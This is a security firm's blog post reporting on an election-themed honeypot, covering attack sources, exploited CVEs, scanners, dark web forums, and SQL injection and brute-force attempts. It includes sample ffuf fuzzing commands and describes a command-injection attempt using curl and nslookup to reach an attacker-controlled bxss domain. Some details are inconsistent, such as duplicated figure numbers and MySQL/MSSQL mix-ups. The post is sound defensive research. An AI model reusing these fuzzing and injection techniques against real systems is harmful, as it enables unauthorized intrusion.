SpiderLabs Blog

Lessons from a Honeypot with US Citizens’ Data

Written by Radoslaw Zdonczyk and Nikita Kazymirsky | Nov 13, 2024 6:10:15 PM

Prior to last week’s US Presidential Election, the Trustwave SpiderLabs team was hard at work investigating potential risks and threats to the election system, from disinformation campaigns to nation-state actors looking to exploit vulnerabilities.

No information that may have potentially affected the election process was discovered at any time during the research. If it had, Trustwave SpiderLabs would have immediately disclosed its findings to the proper authorities.

These findings are part of our ongoing research at Trustwave SpiderLabs to identify vulnerabilities that place infrastructure at risk, including significant SolarWinds vulnerabilities, the novel Facebook malware Ov3r_Stealer, and the sale of millions of voter details on the Dark Web.

 

The Honey Web Service

To explore the topic in depth, we created a website that, with its functionality and the data offered, was certain to attract people with a strong interest in the US elections: a honeypot website specifically crafted to lure, monitor, and dissect cyberattacks targeting the election.

The entire project involved three separate servers, each of which had a separate task. Aside from the main web server that offered our realistic-looking service to US citizens, there were also two servers that logged site visits, traffic generated by bots and malware, and any other attempt to connect to components of the main server, which was the honeypot. Additionally, the main server had extra services, including monitoring attacks from inside and outside.


Figure 1. Our realistic-looking web service preview.

Our honeypot website became an “observatory” that allowed us to anticipate threats, understand evolving tactics, and strengthen defenses in real time. Every failed hack attempt reveals something new, allowing us to build the layers of protection necessary.


Figure 2. Connection sources map to the honeypot.

 

Who Wants to Hack US Public Citizen Services?

The US election is not just an American event; it is a global focal point, making it a prime target for foreign governments, black hat hackers, and advanced persistent threat (APT) groups. These people, often affiliated with nation-states, seek to exploit vulnerabilities for political, strategic, and economic gain.

For some threat actors, such as those based in Russia, hacking the US election is aimed at creating chaos and undermining confidence in democracy. APTs, such as Fancy Bear (aka APT28), focus on disinformation and disruption. They often aim to destabilize US leadership and weaken Western alliances.

China is another player: through groups such as APT41, they are taking a more calculated approach and gather intelligence and strategic data to better position themselves in geopolitical negotiations. These groups want to understand political developments to plan their diplomatic and economic strategies.

In the Middle East, groups like OilRig (APT34) target elections to influence US foreign policy. A more favorable candidate could mean fewer sanctions or less interventions, so hacking becomes a tool for political maneuvering. Meanwhile, European APTs, especially those from Eastern Europe, may seek to alter US-European relations, often in more subtle ways, by gathering intelligence or sowing discord between allies.

Ultimately, the motivations for hacking US election-related sites go far beyond the digital realm. These attacks attempt to upset the global balance of power, influence politics, and weaken America's international standing. The 2024 election represents not just a political contest but also a key battleground in global cybersecurity.

 

Honeypot Highlights

Let's look at the key incidents and data collected by the honeypot to understand attacker behavior and identify typical tactics used against vulnerable server environments. By tracking interactions and connections to various server resources, we gained insight into the techniques and persistence of different types of attackers.

The map shown in Figure 2 shows a global distribution of attack origins targeting the honeypot server located in the US, with significant activity observed worldwide. Brazil stands out as the primary source of attacks in South America, displaying a particularly high intensity of activity. The concentration of attacks originating from Brazil suggests either a high number of vulnerable devices or active malicious actors in the region, possibly heavily contributing to coordinated botnet activity aimed at probing exposed server services.


Figure 3. Number of connections to common network services of the honeypot.

The chart presented in Figure 3 offers an insightful overview of the server's activity, providing critical data for understanding attacker behavior across different service categories.

The web protocols category consistently recorded the highest activity levels, showing attacks in mid-July and late September. These peaks, reaching over 70,000 records, indicate that attackers primarily focused on exploiting the server's web-facing components – we’ll take a closer look at these peaks in succeeding parts of the article.

Activity levels for the DNS, telnet, and database services were notably lower, whereas SSH had constantly low activity levels. Figure 4 shows DNS traffic showed occasional small spikes, representing the reconnaissance process:


Figure 4. Destination port activity statistics.

During this honeypot's design phase, we also wanted to explore the vulnerabilities that attackers can currently exploit.


Figure 5. Top observed CVE requests to the web server.

Figure 5 summarizes the four most exploited CVEs based on our telemetry:

  • CVE-2017-9841 stands out, accounting for over 40% of all detected exploitation attempts and targeting the PHP XML-RPC module in this case.
  • CVE-2019-17558 and CVE-2022-41040 accounted for 13.9% and 8.6% of the total CVE requests, respectively. This indicates that both Apache Solr and Microsoft Exchange continue to be valuable targets for attackers.
  • CVE-2014-2120 had a 12% share of the total CVE requests made to the honeypot. CVE-2014-2120 is a vulnerability in Cisco's Unified Communications Domain Manager (CUCDM), which allows remote attackers to gain unauthorized access.

Aged vulnerabilities do not always mean fixed vulnerabilities — older vulnerabilities remain a significant risk, especially for systems that lack proper patching.

 

CVE-2017-9841

  • Description: A remote code execution (RCE) vulnerability in the phpunit package, often used in web development. Attackers can execute arbitrary code on vulnerable servers by sending malicious requests.
  • Targets: Web servers running unpatched versions of phpunit.

Cybercrime groups frequently exploit CVE-2017-9841 in mass campaigns targeting unpatched websites. These campaigns often aim to deface, host malware, or install backdoors on vulnerable servers. Mirai and Hajime botnets, which are known for large-scale DDoS attacks on IoT devices and PHP servers, have notably utilized this vulnerability. Tools like automated web scanners and web-shell deployment kits, such as Mirai, Gafgyt, and Hajime botnets, are designed to exploit unpatched phpunit servers in coordinated attacks, resulting in significant risks for compromised systems.

 

CVE-2019-17558

  • Description: A deserialization vulnerability in Apache Solr, specifically affecting the DataImportHandler. It allows attackers to execute code by sending a crafted payload through a web request.
  • Targets: Apache Solr servers.

Threat actors often exploit CVE-2019-17558, targeting systems running Apache Solr to gain unauthorized access in data theft and espionage campaigns. Groups like FIN6 and Magecart have been observed exploiting Solr vulnerabilities to compromise web servers and steal valuable data. Tools such as Cobalt Strike and Metasploit frameworks are commonly used to plant malware or execute remote code in these environments. This vulnerability is especially significant in industries handling large amounts of data, making it a preferred vector for sophisticated cybercrime and APT campaigns.

 

CVE-2022-41040

  • Description: A server-side request forgery (SSRF) vulnerability in Microsoft Exchange, leading to privilege escalation when combined with other bugs including CVE-2022-41082.
  • Targets: Microsoft Exchange servers.

CVE-2022-41040 has been widely leveraged by APT groups, such as APT29 (Cozy Bear) and Hafnium, to target Microsoft Exchange servers. These groups exploit this vulnerability, often in combination with other flaws (commonly referred to as ProxyNotShell), to infiltrate corporate networks for espionage and data exfiltration purposes. Tools like ProxyShell and ProxyNotShell attack kits are frequently employed in these campaigns, particularly targeting sectors like government, finance, and healthcare. The goal is typically to gain access and steal sensitive data or disrupt operations.

 

CVE-2014-2120

  • Description: A cross-site scripting (XSS) vulnerability in Cisco Unified Communications Domain Manager. Attackers can inject malicious scripts and steal sensitive data or perform actions on behalf of other users.
  • Targets: Cisco communication systems.

Cyber espionage groups, particularly APT28 (Fancy Bear), actively exploit CVE-2014-2120 by targeting Cisco networking devices used in defense and government sectors. These attackers often leverage this vulnerability to steal credentials or escalate access within the targeted organizations. Typically, it is exploited in combination with phishing or spear-phishing campaigns, allowing adversaries to escalate privileges or deploy malware. XSS exploitation tools, like XSStrike, or phishing kits tailored for communication platforms utilizing Cisco products, are frequently observed in such attacks.

Each of these vulnerabilities plays a critical role across different sectors, frequently targeted by cybercriminals and APT groups. Attacks range from large-scale botnet-driven campaigns, such as those using Mirai or Hajime, to highly focused espionage operations aimed at stealing data or compromising systems, such as those conducted by APT29 and Fancy Bear. These CVEs are integrated into mass-scanning botnets and exploit frameworks such as Metasploit or Cobalt Strike, automating attacks across industries, from financial to government and healthcare sectors.

While the CVEs shown in Figure 5 were specifically selected for closer analysis, we are well aware of the existence of a vast number of other actively exploited CVEs. Many of these vulnerabilities are characterized by lower-intensity attacks or may be harder to detect in our observation scope, yet they still contribute to the broader attack landscape. Our focus here is mainly on analyzing malformed URL strings in web-based attacks, which provide crucial insights into the methods employed by adversaries. By concentrating on this specific angle, we aim to better understand the exploitation tactics associated with commonly accessed URLs, even as we acknowledge the breadth of other vulnerabilities being actively targeted.


Figure 6. Recorded scanner tools.

Figure 6 highlights the tools attackers used to probe the honeypot. Zgrab2 was by far the most frequently used tool, accounting for over 58% of all scans, indicating its popularity among attackers for gathering information on exposed services. This tool’s versatility and ease of use likely contribute to its high prevalence in network reconnaissance activities.

Masscan, an ultra-fast network scanner, is favored by many notorious hacking groups for its ability to quickly scan entire IP address ranges. It has been used in reconnaissance efforts by groups such as APT28, which is involved in state-sponsored espionage, and the Lazarus Group, which is linked to North Korean cyber campaigns. The Shadow Brokers and Anonymous have also leveraged Masscan to find vulnerable services before launching attacks. Its speed and efficiency make Masscan indispensable for hackers and penetration testers alike, targeting massive infrastructure in minimal time, which is why it's so prevalent in advanced threat campaigns.

Masscann is known for its ability to rapidly scan large address spaces, making it a preferred choice for attackers aiming to quickly map vulnerable targets. Odin.io also represents a notable portion, suggesting a trend towardthe use of specialized services for detailed scanning. Meanwhile, Nmap, a tool that needs no introduction, was also used on the honeypot by attackers. And the barely noticeable Xenu Link Sleuth, not widely used in Western world, managed to get into this chart.

 

A Look at the Depths of the Dark Web

The dark web is widely known as a clandestine hub for trading stolen data, exploits, and illegal goods. However, its role extends far beyond just marketplaces for illicit transactions. It is a thriving ecosystem where cybercriminals interact, share knowledge, and collaborate on various illegal ventures. Within this space, forums and chatrooms serve as breeding grounds for malicious activities, where cyber actors can identify and discuss high-value targets from the clear web, such as corporations, governments, or individuals. More than just a shopping center for stolen credentials or malware, it’s a space for networking among cybercriminals to plan, execute, and refine attacks.


Figure 7. A dark web forum thread dedicated to web vulnerabilities.

In the dark web, malicious actors often view the clear net as a space where potential victims can be identified and thoroughly evaluated. Hackers actively search for signs of weakness or vulnerability in online services, social media platforms, corporate websites, and public-facing databases. They rely on scanning tools and reconnaissance methods to uncover exposed systems, insecure endpoints, and valuable user data.


Figure 8. A threat actor suggests solutions for another member on a dark web forum.

From their vantage point, cybercriminals assess potential victims on the clear net by meticulously evaluating any available information, such as leaked credentials or security misconfigurations. They look for vulnerabilities like unpatched systems or weak encryption, which allowing them to infiltrate networks or install malware.


Figure 9. A malicious actor on a dark web forum fixes sqlmap request parameters for a target.

Once a victim is identified, discussions often shift toward refining tactics to maximize the impact, whether through data theft, ransomware, or credential exploitation. This collaborative mindset helps actors in the dark web continuously improve their ability to find and exploit targets on the clear net.


Figure 10. The malicious actor asks how to install shell from local file inclusion (LFI) in a potentially weak piece of code.

What makes the dark web even more dangerous is its role as an educational platform. Experienced hackers and cybercriminals often train newer members, teaching them the skills needed to carry out sophisticated cyberattacks, ranging from step-by-step guides on launching phishing campaigns to discussions on bypassing modern security measures.


Figure 11. The actor describes an attack chain against Hack The Box, an online educational platform.

The dark web acts as an informal training ground for cybercriminals of all levels. It’s also a forum for sharing best practices on avoiding law enforcement, building exploits, and maintaining anonymity. As a result, the dark web not only facilitates cybercrime but nurtures a constantly evolving community that works together to sharpen its tactics, making it a significant threat to organizations and individuals alike.

 

Web Server Highlights

Let's discuss the highlighted events, numbers, and characteristics we observed in the attacks we’ve analyzed, which offer a snapshot of the activity surrounding the server throughout the observation period.

 

Network Protocols

The data in Figure 12 reflects a broad mix of network protocols, including SSH, SSL, HTTP, and DNS, giving us a glimpse into the variety of interactions and potential threats that targeted the server.


Figure 12. Network protocols statistics.

The server experienced several heavily concentrated attack events, including directory enumeration, brute-force attempts, and SQL injection (SQLi) targeting Apache and MySQL services. Notably, SSH accounted for 51% of the traffic, indicating a significant volume of probing for remote access vulnerabilities. DNS activity was also prominent, making up 29% of the observed traffic, suggesting legitimate usage and potential reconnaissance efforts.

 

TLS User Agent

It's no surprise that a typical web server is visited by a very large number of user agents (or TLS clients), bots, or simply browsers. When visiting a web page, each of these options presents itself to the server with a string of characters, the so-called “user agent,” because of which we can find out what software the other party (client) used to connect to our server. On the other hand, the “user agent” string is very easy to manipulate, and it can be changed or customized to whatever we want. The statistics are as follows:


Figure 13. Top TLS agent names.

Based on Figure 13, We can filter out the noisy results related to Mozilla, a web browser and common user agent. By doing so, we are left with the following:


Figure 14. Top TLS agent names [Mozilla excluded]

Figure 14 shows that the values of the user agent field are commonly changed and should be treated with caution. The data reveals that the TLS client “Fuzz Faster U Fool v2.1.0-dev” has generated the highest number of connections, with 185,959 instances, followed by “Fuzz Faster U Fool v2.1.0” with 34,975 connections. Unfortunately, the most common IP addresses that have been recorded, along with the most counted connections, lead to TOR nodes.

Reconnaissance and scanning tools like “ivre-masscan” and “Expanse” are present, though their contribution to the connection count is relatively minor. The presence of such tools highlights ongoing network-wide reconnaissance activities that target this server, emphasizing the need for continuous monitoring and response mechanisms. We also noted the presence of generic or unusual user agents, such as “-“, “”, and “!(()&&!|*|”, each with hundreds of connections. These user agents seem to be attempting to obscure the client's identity.

On the other hand, to characterize a given connection with improved efficiency, we used a solution called Ja3. We will focus on this aspect in a succeeding part of the article.

 

HTTP Requests

Web request analysis, especially HTTP GET and POST, is useful to identify attacks and potential vulnerabilities. Examining requested files and directories can help spot unusual patterns and potentially malicious activity.

GET requests were the most prevalent, constituting most of the traffic, while POST requests and other types occurred less frequently. Attempted exploit payloads were usually carried via POST requests.


Figure 15. HTTP request methods.

The high volume of GET requests highlights the attackers’ emphasis on reconnaissance, a very common practice. Attackers usually understand the structure of the server and identify any weak points they could exploit. The relatively low proportion of POST requests, despite their smaller share, remains a concern, as they often carry potentially harmful payloads. This indicates that the adversary was probing for targets with specified requests.

User agent string analysis provides valuable insights into the nature of web traffic. Most user agents recorded during our research were FFUF (Fuzz Faster U Fool) Fuzzer and variations of Mozilla, together accounting for 98.7% of all requests.


Figure 16. Web browser top client names.

FFUF is a popular web fuzzing tool widely used by hackers and penetration testers for its speed, versatility, and advanced capabilities. One of its standout features is its ability to target multiple vectors in web applications, making it a powerful tool in security testing. FFUF’s efficiency allows it to quickly discover hidden files, directories, or parameters that are not publicly accessible, giving attackers a broader surface to explore.

 
Figure 17. An actor on a dark web forum suggests the use of the FFUF software as a better scanner to try (post translated).

What makes FFUF particularly appealing is its ability to handle various fuzzing targets, such as web directories, HTTP parameters, DNS subdomains, and even HTTP headers. Its extensive configurability enables users to craft highly tailored attacks based on specific use cases. This makes it useful for basic brute-forcing and more complex web application testing, including parameter fuzzing and discovering vulnerable endpoints.

For example, in an advanced configuration, FFUF can be used to fuzz POST requests with custom data or fuzz HTTP headers for vulnerabilities in header handling:

ffuf -w /path/to/wordlist.txt -u https://example.com -X POST -d "username=FUZZ&password=test"

This highlights FFUF’s flexibility, as it allows for parameter fuzzing to uncover security holes in login forms or other parts of the application where data is processed.

Additionally, FFUF can handle fuzzing across different HTTP request methods and leverage customized headers, as seen in cases where security filters were bypassed by tampering with header information:

ffuf -w /path/to/wordlist.txt -u https://example.com -H "X-Custom-Header: FUZZ"

The tool’s adaptability makes it suitable for a variety of attack vectors, helping identify issues, such as broken authentication, file inclusion, or security misconfigurations across various endpoints. By discovering these vulnerabilities, attackers or testers can gain access to critical web resources or find exploitable weaknesses in web applications.

FFUF’s ability to brute-force web resources quickly is enhanced by its integration with other security tools. By connecting it with proxies or using it in conjunction with vulnerability scanners, it gives attackers and pentesters a comprehensive view of a web application’s attack surface. This multi-vector capability, combined with FFUF’s speed and ease of use, makes it one of the most sought-after tools in offensive security operations, particularly in web-based testing scenarios.

 

Connections Activity

HTTP response codes play a vital role in understanding how clients and servers interact during web communication. They provide crucial insights into web traffic behavior, user experience, and potential security considerations.


Figure 18. Top HTTP responses.

The HTTP responses reveal an aspect of the attacks, and, together with the rest of the analysis, create a compelling story about the methods attackers use.

  • 404 (Not Found) response was the most frequently triggered, making up 58.7% of the total responses. This indicates that attackers were aggressively searching for hidden resources, non-existent admin panels, or vulnerable directories that could serve as a gateway to the system. Each 404 response is essentially a missed shot in a larger campaign of scanning and resource discovery using automated tools (Figure 17) to quickly and systematically sift through potential entry points. The high frequency of this response reveals the intensity of the attackers' reconnaissance efforts to understand the server structure and identify vulnerabilities.
  • 200 (OK) response, which made up 16.4% of the responses. This status code signifies that the requested resource was found and served successfully. In the context of our honeypot, every 200 responses likely means that the attackers discovered a legitimate-looking page. Unlike the 404 errors that show blind probing, a 200 response indicates interest and successful access.
  • 301 (Moved Permanently) response, observed in 23.4% of cases. The numbers behind these values tell us, for the most part, about attempts to visit the site through the http protocol. Most of today's web servers have such a redirect set.

Figure 19 shows the volume of HTTP, HTTPS, and MySQL records over a period of time:


Figure 19. Three main domains of observation and their attack coverage.

Significant peaks are noticeable, primarily for HTTPS traffic where a sharp increase was seen in mid-September. This pattern illustrates a series of attack attempts targeting the HTTPS service. These large fluctuations in HTTPS traffic indicate targeted attempts to bypass security measures and explore more secure channels. This emphasizes the need for diligent monitoring and possibly enhanced rate-limiting on HTTPS endpoints to mitigate potential distributed denial-of-service (DDoS) attacks or brute-force attempts.

The relatively stable but present MySQL activity shows attempts to gain unauthorized access to backend databases. Any successful access here could have critical implications, as it might lead to data breaches or further exploitation within the internal network.

 

Searching SQLi

In Figure 20, we observed a snippet of an SQLi attack aimed at the website's search functionality. While we recorded several similar SQLi attempts during the monitoring period, none of these attacks were significant enough to pose any real threat to the service’s security. The inadequate payloads and weak execution demonstrated by the attackers left the system largely unaffected. However, it remains a reminder of the ongoing risks associated with such vulnerabilities, emphasizing the importance of robust security measures in web forms.


Figure 20. A web service user’s search log (SQLi attack).

The attack demonstrates a typical approach, employing SQLi techniques to probe our database. The attacker systematically tested various database systems by utilizing functions unique to MySQL, PostgreSQL, SQL Server, and Oracle. This strategy indicates an effort to perform database fingerprinting, allowing the attackers to identify the specific database management system being used and tailor their attacks accordingly.

The SLEEP(5) function indicates a time-based SQLi attack (blind SQLi), aiming to call and observe delays in the database response. By observing these delays, attackers can infer whether certain conditions were true, thereby gaining insight into the database structure and behavior without direct access to data outputs. Also, the attackers incorporated conditional statements and character encoding within their inputs; by using functions such as CHR() or CHAR() to represent characters, attackers attempted to bypass input validation mechanisms that might block specific keywords or patterns associated with SQL injection attacks. This approach increased the likelihood of malicious input being accepted and executed by the database. By embedding always-true logical conditions such as “1219=1219” within SQL statements, the attacker could test the database's behavior and the application's response to injected code, assisting in mapping out potential vulnerabilities.


Figure 21. A web service user’s search log (command injection).

The input log above is a command injection attempt, in which the attacker tried to execute system commands via the website’s form fields. The use of the nslookup and curl commands indicates an attempt to connect to a remote host under its control under the bxss[.]me domain:

The ${IFS} variable represents the internal field separator on Unix systems, which is usually a space character and is used to avoid detection by security scanners.

 

Overlooked db_backup.tar.gz

To increase the project’s reach, we created a seemingly hidden backup directory at “honeydomain.com/backup” and placed a database dump inside. The file, “database_backup.tar.gz”, was watermarked to track its distribution and detect any mentions on the dark web or other underground channels. Despite 22 unique visitors accessing the directory, most attackers appeared to overlook the file’s presence entirely, failing to recognize its significance.

This oversight highlighted a lack of thoroughness in the attackers’ behavior. Even more telling, were the numbers of visits to the “files” subdirectory in the “backup” directory. This directory is mentioned in the “.htaccess file” for attackers preparing to improve their attack. The subdirectory contained an empty “index.html file,” which was intended only to raise curiosity and was meant to get attackers to enumerate the directories more deeply. Despite receiving 10 visits, it remained unexplored. Such patterns reveal that many attackers relied on automated tools without performing manual verification, missing a chance to uncover valuable resources.

The first suspicious download from a TOR node occurred on September 22, 2024. The second download took place on October 2, 2024, involving a few IP addresses from Russia, and none of which were TOR nodes. In total, we have recorded nine download attempts for ‘database_backup.tar.gz’, and an analysis revealed two unknown actors (groups.)


Figure 22. Number of accesses to the backup location.

The attackers’ incomplete reconnaissance and failure to investigate key directories further even after identifying them suggest that their preparation was superficial, and their methodology was far from sophisticated.

 

Ja3 Indicators

Ja3 fingerprints represent unique SSL/TLS client signatures used for identifying clients based on how they communicate. These fingerprints are calculated by combining attributes such as SSL versions, cipher suites, and supported elliptic curves, making each fingerprint a valuable identifier in monitoring traffic patterns and recognizing malicious actors.


Figure 23. Most active Ja3-fingerprinted clients.

It’s hard to ignore the massive number of connections by the two most active TLS clients shown in Figure 23.


Figure 24. Highlighted activity of two of the most active TLS clients based on our telemetry.

The first hash, with over 95,000 connections, correlates to directory enumeration attempts recorded that day. Examining the top hash (1be8360b66649edee1de25f81d98ec27) shows associations with known malicious activities and tools such as Cobalt Strike or Metasploit, as well as the Tofsee malware.

The second hash (bff6a4467efb3b8eb8688abd7f120f8e) observed more than 20,000 connections, which, interestingly, came from only one IP address: 146.70.193.89. This event was the beginning of larger directory enumeration activity that was recorded from around September 14 (Figure 24).

During the heavy reconnaissance attack period on August 31 and September 17, specific IP addresses were involved in requests using tools like "Fuzz Faster U Fool" and common browser agents, as seen in Figure 19.

The high volume of records linked to these JA3 hashes indicated persistent campaigns involving automated tools as well as attempts to mimic legitimate user behavior.

 

MySQL Highlights

The database was one of the key components of the whole project. Our MySQL server served the site by offering a huge amount of forged data that we created. We made the data to be very attractive to all kinds of attackers.

Figure 24 shows the number of connections to the database over a two-month period (August and September 2024).


Figure 24. Authentication attempts to the MySQL server between August and September 2024.

The histogram presents the sum of all MSSQL login attempts (brute-force) on all listening database ports. We recorded different usernames tested in MSSQL attacks. The most common usernames tested were root and admin.


Figure 21. MySQL’s brute-force usernames tested.

The username “root” was the most frequently targeted, accounting for 14,003 connections, which vastly outnumbered the rest. This suggests that attackers are heavily focusing on gaining elevated privileges by attempting to brute-force or exploit the root account, which, if successful, would grant complete control over the system. The high volume of attempts targeting “root” emphasizes a critical need for strong password policies, restricted access, and additional protective measures such as disabling remote root login.

The other usernames, including “admin,” “app,” “dba,” “dbuser,” and others, have significantly fewer connection attempts, each within the range of a few hundred. This indicates a more opportunistic approach from attackers who may be testing common usernames in hopes of gaining a foothold. However, the disparity in numbers suggests that “root” remains the primary target for its high-level privileges.

 

Good Security Practices

  • Correctly configured ‘.htaccess’ can stop many common attacks. Access limitation can be applied to specific directories or files by using directives such as AuthType, AuthName, and Require. This is particularly useful for protecting sensitive areas of your website, including admin panels or private data. Another useful security option that can be configured using the ‘.htaccess’ file are HTTP headers, such as Content Security Policy (CSP), which help prevent cross-site scripting attacks and data injection.
  • Restricting common usernames and simple passwords can help mitigate dictionary and brute-force attacks.
  • Automated exploitation attacks by botnets are still prevalent in the cybersecurity landscape, putting a wide range of unpatched systems at risk. Prompt application of security patches and updates to your web applications and databases will help mitigate the exploitation of known vulnerabilities.
  • Prompt application of security patches and updates to your web applications and databases can help mitigate the exploitation of known vulnerabilities.

 

Summary

The 2024 US Election became a battleground not only for political candidates but also for cyber adversaries aiming to undermine the democratic process. The honeypot we deployed to mimic a citizen service-related web service encountered persistent and sophisticated cyber activity from a wide range of attackers. The motivations spanned everything from political manipulation to opportunistic attacks, revealing the extensive digital risks to election integrity.

The honeypot captured a variety of attack types, including brute force, directory enumeration, and SQL injection attempts, targeting both web applications and databases. Automated tools like FFUF, Masscan, and Zgrab2 were heavily employed, emphasizing the attackers' focus on large-scale reconnaissance and exploitation. A significant number of attacks aimed at gaining administrative access, with a particular focus on brute forcing the “root” account, underscoring the critical need for robust access control measures.

The findings from the honeypot illustrate the importance of enforcing strong access controls, such as using complex passwords and disabling default usernames like “root” to deter brute-force attempts. Limiting unnecessary services, applying security patches promptly, and implementing network-level security measures are also essential steps in mitigating these threats. Organizations can further reduce the risk of successful attacks by using .htaccess files to restrict access to sensitive directories and employing rate limiting.

Monitoring activity on the dark web can provide early insights into potential threats and vulnerabilities, while regular security audits and assessments can help identify weak points before attackers exploit them. Utilizing honeypots remains a valuable strategy, offering unique insights into emerging attack methods and helping defenders stay ahead of malicious actors.

The data collected throughout this project shows that the threat to election infrastructure is real and persistent. By taking proactive measures to strengthen security, the resilience of critical systems can be significantly improved, ensuring that the democratic process remains secure and that public trust is maintained.